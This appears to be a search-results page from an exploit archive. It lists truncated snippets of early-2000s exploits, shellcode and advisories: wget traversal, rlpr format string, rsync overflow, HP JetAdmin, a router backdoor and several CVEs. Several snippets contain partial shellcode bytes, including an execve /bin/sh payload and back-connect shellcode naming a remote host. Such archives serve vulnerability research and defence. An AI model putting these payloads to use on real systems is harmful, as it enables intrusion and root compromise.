430 matches found
mtftpd 0.0.3 - Remote Code Execution
mtftpd 0.0.3 - Remote Code Execution / \ mtftpd include include include include include include include include include include define PORT 21 define doit b0, b1, b2, b3, addr \ b0 = a...
adpl33t.txt
Adp Elite system is an invoice/purchase order suite very common in car dealerships. It's a telnet based system. When a user logs in via telnet, adp dumps the user into the program where the user can check on a vehicle's status, generate PO's and RO's, etc.... The program is rather large and runs ...
wget 1.9 - Directory Traversal
#!/usr/bin/perl -W wgettrap.poc -- A POC for the wget1 directory traversal vulnerability Copyright 2004 Jan Minář jjminar fastmail fm License: Public Domain When wget connects to us, we send it a HTTP redirect constructed so that wget wget will connect the second time, it will be attempting to...
linux/x86 execve /bin/sh alphanumeric 392 bytes
linux/x86 execve /bin/sh alphanumeric 392 bytes. Shellcode exploit for linx86 platform / Linux/x86 execve of /bin/sh you can put 0-200 nops before shellcode nop = 0x47 = 'G' / char shellc = // nops here .. "LLLLXPY3E01E01u03u0fXh8eshXf5VJPfhbifhDefXf5AJfPDTYhKATYX5KATY"...
bsd/x86 - connect 93 bytes
bsd/x86 connect 93 bytes. Shellcode exploit for bsdx86 platform / the back-connect shellcode. The destination addr is 0x28402ec3 rootteam.host.sk port is 0x8ae 2222. size = 93 bytes little isn't it? Greetz 2 sp00fed written by dev0id rus-sec /EFnet rootteam.host.sk BITS 32 jmp short path main: po...
dynalink.Backdoor.txt
I was playing with a Dynalink RTA 230 http://www.dynalink.co.nz/products/rta230.htm, a linux based mips-cored adsl router. Looking at embedded linux system, I've found something like a backdoor: cat /etc/passwd admin:xxxxxobscuredxxxxx:0:0:Administrator:/:/bin/sh...
Dynalink routers backdoor?
I was playing with a Dynalink RTA 230 http://www.dynalink.co.nz/products/rta230.htm, a linux based mips-cored adsl router. Looking at embedded linux system, I've found something like a backdoor: cat /etc/passwd admin:xxxxxobscuredxxxxx:0:0:Administrator:/:/bin/sh...
CVE-2004-0186
smbmnt in Samba 2.x and 3.x on Linux 2.6, when installed setuid, allows local users to gain root privileges by mounting a Samba share that contains a setuid root program, whose setuid attributes are not cleared when the share is mounted...
CVE-2004-0602
The CVE-2004-0602 issue affects FreeBSD 4.x/5.x Linux binary compatibility mode. A programming error in handling certain Linux system calls can allow a local attacker to read/overwrite kernel memory, potentially gaining privileges or causing a system panic. Remediation in the connected docs inclu...
rlpr <= 2.04 msg() Remote Format String Exploit
Exploit for linux platform in category remote exploits =============================================== rlpr 0,1,2 lnxstagetwo = "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x04" lnxstagetwo += "\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80" execute /bin/sh lnxstagetwo += "\x90" 100...
JetRoot_pl.txt
#!/usr/bin/perl use IO::Socket; This is an exploit for HP Web JetAdmin, the printer management server from HP. It is NOT about printers! The service usually runs on port 8000 on Windows, Solaris or Linux boxes. Greetz: The Phenoelit People, c-base crew, EEyE rock!, Halvar on the other side of the...
rsync 2.5.7 - Local Stack Overflow Local Privilege Escalation
rsync 2.5.7 - Local Stack Overflow Local Privilege Escalation / rsync / Includes for code to daemonize / include include include include // define PATH "/usr/local/bin/rsync" define BUFFSIZE 100 //define RET 0xbffffdfb / 88 bytes portbinding shellcode - linux-x86 - by bighawk bighawk warfare com...
----------========== OPEN3S-2003-08-08-eng-informix-onshowaudit ==========----------
----------========== OPEN3S-2003-08-08-eng-informix-onshowaudit ==========---------- Title: Local Vulnerability in IBM Informix IDS v9.40 onshowaudit binary Date: 08-08-2003 Platform: Only tested in Linux but can be exported to others. Impact: Users with exec perm over ./bin/onshowaudit can read...
Abyss Web Server 1.01.1 - Authentication Bypass
Abyss Web Server 1.01.1 - Authentication Bypass source: https://www.securityfocus.com/bid/9171/info It has been reported that Abyss Web Server is prone to an authentication bypass vulnerability that may allow an attacker to gain access to server resources. This issue may be carried out by accessi...
Abyss Web Server 1.0/1.1 - Authentication Bypass
source: https://www.securityfocus.com/bid/9171/info It has been reported that Abyss Web Server is prone to an authentication bypass vulnerability that may allow an attacker to gain access to server resources. This issue may be carried out by accessing a password protected directory under which th...
Gordano Messaging Suite 9.0 - 'WWW.exe' Denial of Service
source: https://www.securityfocus.com/bid/8576/info It has been reported that Gordano Messaging Suite may be prone to a denial of service issue allowing a remote attacker to send malformed HTTP GET requests to cause the WWW.exe process to crash. The problem may lead to the termination of services...
GtkFtpd 1.0.4 Remote Root Buffer Overflow Exploit
Exploit for linux platform in category remote exploits ================================================= GtkFtpd 1.0.4 Remote Root Buffer Overflow Exploit ================================================= / gtkftpdv1.0.4and below: remote root buffer overflow exploit. by: vade79/v9 v9 at...
CVE-2003-0476
The execve system call in Linux 2.4.x records the file descriptor of the executable process in the file table of the calling process, which allows local users to gain read access to restricted file descriptors...
Slight privilege elevation from bin to root in IBM DB2 7.1 - 8.1 all binaries
Title: Local Vulnerability in IBM DB2 7.1 - 8.1 all binaries Date: 27-07-2003 Platform: Only tested in Linux but can be exported to others. Only versions 7.1 and Enterprise Server Edition v8.1 were checked but could affect other versions. Impact: Slight privilege elevation from bin to root. Autho...
WsMp3d 0.x - Remote Heap Overflow
WsMp3d 0.x - Remote Heap Overflow / Title: Remote Heap Corruption Overflow vulnerability in WsMp3d + Exploit: 0x82-Remote.WsMp3d.again.c bash$ ./0x82--Remote.WsMp3d.again -h 61.37.xxx.xx -t2 WsMp3 Server Heap Corruption Remote root exploit by Xpl017Elz. + Hostname: 61.37.xxx.xx + Port num: 8000 +...